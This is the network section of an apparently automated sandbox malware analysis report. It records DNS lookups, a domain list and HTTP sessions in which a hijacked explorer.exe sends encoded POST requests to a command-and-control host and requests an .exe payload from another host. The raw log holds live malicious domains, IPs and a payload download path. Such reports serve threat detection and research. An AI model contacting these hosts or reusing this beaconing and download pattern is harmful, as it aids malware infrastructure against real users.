                                                                                                                                                                                                          Dec 31, 2021 19:22:56.963454962 CET8.8.8.8192.168.2.30x6dc8No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.121001005 CET8.8.8.8192.168.2.30xb588No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.276771069 CET8.8.8.8192.168.2.30x1f6aNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.395519972 CET8.8.8.8192.168.2.30x9d1dNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.517251015 CET8.8.8.8192.168.2.30x5db5No error (0)file-file-host4.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.552567959 CET8.8.8.8192.168.2.30xdebbNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.702549934 CET8.8.8.8192.168.2.30xa0fdNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.862255096 CET8.8.8.8192.168.2.30xe95No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.862255096 CET8.8.8.8192.168.2.30xe95No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.862255096 CET8.8.8.8192.168.2.30xe95No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.862255096 CET8.8.8.8192.168.2.30xe95No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.862255096 CET8.8.8.8192.168.2.30xe95No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.197926044 CET8.8.8.8192.168.2.30x2337No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.353663921 CET8.8.8.8192.168.2.30x2626No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.519733906 CET8.8.8.8192.168.2.30x18c2No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:23.895402908 CET8.8.8.8192.168.2.30x23f9No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:24.113950014 CET8.8.8.8192.168.2.30x47e1No error (0)data-host-coin-8.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:25.833362103 CET8.8.8.8192.168.2.30x69e3No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:25.995177984 CET8.8.8.8192.168.2.30xd982No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.150490046 CET8.8.8.8192.168.2.30x5b97No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.303849936 CET8.8.8.8192.168.2.30xe815No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.466438055 CET8.8.8.8192.168.2.30xe814No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.625623941 CET8.8.8.8192.168.2.30xb76No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:29.730024099 CET8.8.8.8192.168.2.30x543cNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.051368952 CET8.8.8.8192.168.2.30x7ae6No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.232072115 CET8.8.8.8192.168.2.30xd12dNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.395318031 CET8.8.8.8192.168.2.30x88beNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.580720901 CET8.8.8.8192.168.2.30xd2a7No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.728912115 CET8.8.8.8192.168.2.30x3bc6No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.728912115 CET8.8.8.8192.168.2.30x3bc6No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.965697050 CET8.8.8.8192.168.2.30x720cNo error (0)bitly.com67.199.248.15A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.965697050 CET8.8.8.8192.168.2.30x720cNo error (0)bitly.com67.199.248.14A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:32.169862032 CET8.8.8.8192.168.2.30x8863No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:32.335908890 CET8.8.8.8192.168.2.30xd7aNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.088336945 CET8.8.8.8192.168.2.30xe046No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.246359110 CET8.8.8.8192.168.2.30x3691No error (0)short.link104.21.41.11A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.246359110 CET8.8.8.8192.168.2.30x3691No error (0)short.link172.67.158.215A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.450301886 CET8.8.8.8192.168.2.30xbcbbNo error (0)dodecoin.org164.132.207.80A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:34.915153980 CET8.8.8.8192.168.2.30x77b9No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:35.090267897 CET8.8.8.8192.168.2.30xa50cNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:24:07.914108038 CET8.8.8.8192.168.2.30x2bd9No error (0)t.me149.154.167.99A (IP address)IN (0x0001)

                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                          • cdn.discordapp.com
                                                                                                                                                                                                          • bit.ly
                                                                                                                                                                                                          • bitly.com
                                                                                                                                                                                                          • transfer.sh
                                                                                                                                                                                                          • short.link
                                                                                                                                                                                                          • dodecoin.org
                                                                                                                                                                                                          • jkkeh.com
                                                                                                                                                                                                            • host-data-coin-11.com
                                                                                                                                                                                                          • paagmrxgm.org
                                                                                                                                                                                                          • privacytools-foryou-777.com
                                                                                                                                                                                                          • sxruse.net
                                                                                                                                                                                                          • ycrskwoyr.org
                                                                                                                                                                                                          • kcmwbj.org
                                                                                                                                                                                                          • fplnkk.org
                                                                                                                                                                                                          • tocckist.org
                                                                                                                                                                                                          • slfbv.com
                                                                                                                                                                                                          • awqqms.com
                                                                                                                                                                                                          • erudng.org
                                                                                                                                                                                                          • data-host-coin-8.com
                                                                                                                                                                                                          • hwkkkbswtf.org
                                                                                                                                                                                                          • rtxigbrl.org
                                                                                                                                                                                                          • yxkmtikn.net
                                                                                                                                                                                                          • piydputbq.com
                                                                                                                                                                                                          • unicupload.top
                                                                                                                                                                                                          • lrbpoemjfa.net
                                                                                                                                                                                                          • xdctril.com
                                                                                                                                                                                                          • edvbcrjk.net
                                                                                                                                                                                                          • ghfptm.com
                                                                                                                                                                                                          • yntwmx.net
                                                                                                                                                                                                          • smhel.com
                                                                                                                                                                                                          • ofikhxrblm.org
                                                                                                                                                                                                          • iagotmptv.com
                                                                                                                                                                                                          • 185.7.214.171:8080
                                                                                                                                                                                                          • gojbnwwiu.org
                                                                                                                                                                                                          • file-file-host4.com
                                                                                                                                                                                                          • axvhnmv.org
                                                                                                                                                                                                          • pjiki.org
                                                                                                                                                                                                          • yajqqfxbs.net
                                                                                                                                                                                                          • dantqwhs.net
                                                                                                                                                                                                          • meiprwiro.net
                                                                                                                                                                                                          • ljbhnxlymc.org
                                                                                                                                                                                                          • uwwpu.com
                                                                                                                                                                                                          • sbnixcsxgc.org
                                                                                                                                                                                                          • jejnywv.net
                                                                                                                                                                                                          • wumddtukdf.org
                                                                                                                                                                                                          • dxloujq.org
                                                                                                                                                                                                          • dfxeayag.net
                                                                                                                                                                                                          • 91.243.44.128
                                                                                                                                                                                                          • mkywnx.com
                                                                                                                                                                                                          • peohmenso.com
                                                                                                                                                                                                          • uqnmulbyla.com
                                                                                                                                                                                                          • fpvmtbyuw.net
                                                                                                                                                                                                          • qsrlhvaju.com
                                                                                                                                                                                                          • hcvyqvy.net
                                                                                                                                                                                                          • adfmjw.com
                                                                                                                                                                                                          • ynpnhswfhp.com
                                                                                                                                                                                                          • bdqusscd.org

                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          0192.168.2.349799162.159.133.233443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          1192.168.2.34983067.199.248.10443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          10192.168.2.34974831.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.268470049 CET1466OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://ycrskwoyr.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 126
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.345017910 CET1467INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:43 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          11192.168.2.34974931.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.730528116 CET1468OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://kcmwbj.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 167
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.822657108 CET1469INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:43 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          12192.168.2.34975031.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.170577049 CET1470OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://fplnkk.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.245865107 CET1471INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:44 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          13192.168.2.34975131.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.331693888 CET1472OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://tocckist.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 159
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.412056923 CET1472INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:44 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          14192.168.2.34975231.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.490600109 CET1473OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://slfbv.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 337
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.566131115 CET1474INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:44 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2dI:82OI:J_J-WS,/0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          15192.168.2.34975431.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:46.932275057 CET1476OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://awqqms.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 280
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.033960104 CET1477INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:47 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          16192.168.2.34975531.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.110975027 CET1477OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://erudng.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 301
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.185904980 CET1478INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:47 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          17192.168.2.34975631.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.533035994 CET1479OUTGET /files/5376_1640094939_1074.exe HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: data-host-coin-8.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.590043068 CET1480INHTTP/1.1 404 Not Found
